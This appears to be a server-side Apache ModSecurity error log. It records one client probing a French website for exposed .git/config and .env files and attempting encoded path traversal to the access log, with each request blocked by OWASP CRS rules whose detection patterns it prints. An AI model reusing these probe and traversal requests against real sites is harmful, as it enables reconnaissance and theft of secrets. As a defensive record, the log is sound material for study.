[Mon May 11 12:33:28.397761 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:39894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwdkYQeUtAPynIs6xnoQAAABg"]
[Mon May 11 12:33:28.423858 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:39902] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.git/config~"] [unique_id "agGweJkIEwRJMyDaV55dHwAAAUo"]
[Mon May 11 12:33:28.424169 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:39902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.git/config~"] [unique_id "agGweJkIEwRJMyDaV55dHwAAAUo"]
[Mon May 11 12:33:29.580173 2026] [security2:error] [pid 1256241:tid 1256256] [client 185.177.72.9:39902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGweJkIEwRJMyDaV55dHwAAAUo"]
[Mon May 11 12:33:29.607596 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:39906] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.git/config~"] [unique_id "agGweURdw2n9wv6Ai48WggAAAIg"]
[Mon May 11 12:33:29.607794 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:39906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.git/config~"] [unique_id "agGweURdw2n9wv6Ai48WggAAAIg"]
[Mon May 11 12:33:30.818173 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:39906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGweURdw2n9wv6Ai48WggAAAIg"]
[Mon May 11 12:33:30.840667 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:39922] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwehjZymfuKpjWXeiLlAAAAM4"]
[Mon May 11 12:33:30.844676 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:39922] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%5c found within REQUEST_URI_RAW: /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwehjZymfuKpjWXeiLlAAAAM4"]
[Mon May 11 12:33:30.844975 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:39922] ModSecurity: Warning. Matched phrase "..\\\\" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ..\\x5c found within REQUEST_URI: /..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwehjZymfuKpjWXeiLlAAAAM4"]
[Mon May 11 12:33:30.846255 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:39922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwehjZymfuKpjWXeiLlAAAAM4"]
[Mon May 11 12:33:32.049945 2026] [security2:error] [pid 1254133:tid 1254150] [client 185.177.72.9:39922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwehjZymfuKpjWXeiLlAAAAM4"]
[Mon May 11 12:33:32.071838 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:39928] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwfL4KNmD_mZ_vlf9IUwAAAFA"]
[Mon May 11 12:33:32.072317 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:39928] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%5c found within REQUEST_URI_RAW: /..%5c..%5c..%5c..%5c..%5c..%5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwfL4KNmD_mZ_vlf9IUwAAAFA"]
[Mon May 11 12:33:32.072559 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:39928] ModSecurity: Warning. Matched phrase "..\\\\" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ..\\x5c found within REQUEST_URI: /..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cvar/log/apache2/access.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwfL4KNmD_mZ_vlf9IUwAAAFA"]
[Mon May 11 12:33:32.073026 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:39928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\var/log/apache2/access.log"] [unique_id "agGwfL4KNmD_mZ_vlf9IUwAAAFA"]
[Mon May 11 12:33:33.238209 2026] [:error] [pid 1256241:tid 1256253] [client 209.42.16.160:60216] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 12:33:33.317880 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:39928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwfL4KNmD_mZ_vlf9IUwAAAFA"]
[Mon May 11 12:33:38.210985 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:23180] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/.git/config.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env/.git/config.disabled"] [unique_id "agGwgkRdw2n9wv6Ai48WiQAAAJU"]
[Mon May 11 12:33:38.211500 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:23180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env/.git/config.disabled"] [unique_id "agGwgkRdw2n9wv6Ai48WiQAAAJU"]
[Mon May 11 12:33:39.412667 2026] [security2:error] [pid 1254328:tid 1254351] [client 185.177.72.9:23180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwgkRdw2n9wv6Ai48WiQAAAJU"]
[Mon May 11 12:33:39.438955 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:23184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/.git/config.disabled"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env/.git/config.disabled"] [unique_id "agGwg0Rdw2n9wv6Ai48WigAAAI4"]
[Mon May 11 12:33:39.439278 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:23184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env/.git/config.disabled"] [unique_id "agGwg0Rdw2n9wv6Ai48WigAAAI4"]
[Mon May 11 12:33:40.671455 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:23184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwg0Rdw2n9wv6Ai48WigAAAI4"]
[Mon May 11 12:33:40.696995 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:23196] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /app/.git/config.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.git/config.draft"] [unique_id "agGwhGS6k_SCYd1AVZq-XgAAAQ4"]
[Mon May 11 12:33:40.697491 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:23196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.git/config.draft"] [unique_id "agGwhGS6k_SCYd1AVZq-XgAAAQ4"]
[Mon May 11 12:33:41.915496 2026] [security2:error] [pid 1254179:tid 1254195] [client 185.177.72.9:23196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwhGS6k_SCYd1AVZq-XgAAAQ4"]
[Mon May 11 12:33:41.941385 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:23200] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /app/.git/config.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/.git/config.draft"] [unique_id "agGwhWS6k_SCYd1AVZq-XwAAARU"]
[Mon May 11 12:33:41.941542 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:23200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/.git/config.draft"] [unique_id "agGwhWS6k_SCYd1AVZq-XwAAARU"]
[Mon May 11 12:33:43.143146 2026] [security2:error] [pid 1254179:tid 1254202] [client 185.177.72.9:23200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwhWS6k_SCYd1AVZq-XwAAARU"]
[Mon May 11 12:34:27.676992 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:47026] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /selenium/.git/config.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/selenium/.git/config.archived"] [unique_id "agGws0Rdw2n9wv6Ai48WxgAAAIA"]
[Mon May 11 12:34:27.677232 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:47026] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/selenium/.git/config.archived"] [unique_id "agGws0Rdw2n9wv6Ai48WxgAAAIA"]
[Mon May 11 12:34:28.881328 2026] [security2:error] [pid 1254328:tid 1254331] [client 185.177.72.9:47026] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGws0Rdw2n9wv6Ai48WxgAAAIA"]
[Mon May 11 12:34:28.910792 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:47034] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /selenium/.git/config.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.git/config.archived"] [unique_id "agGwtL4KNmD_mZ_vlf9IqwAAAFE"]
[Mon May 11 12:34:28.911272 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:47034] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/selenium/.git/config.archived"] [unique_id "agGwtL4KNmD_mZ_vlf9IqwAAAFE"]
[Mon May 11 12:34:30.145577 2026] [security2:error] [pid 1254242:tid 1254262] [client 185.177.72.9:47034] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGwtL4KNmD_mZ_vlf9IqwAAAFE"]
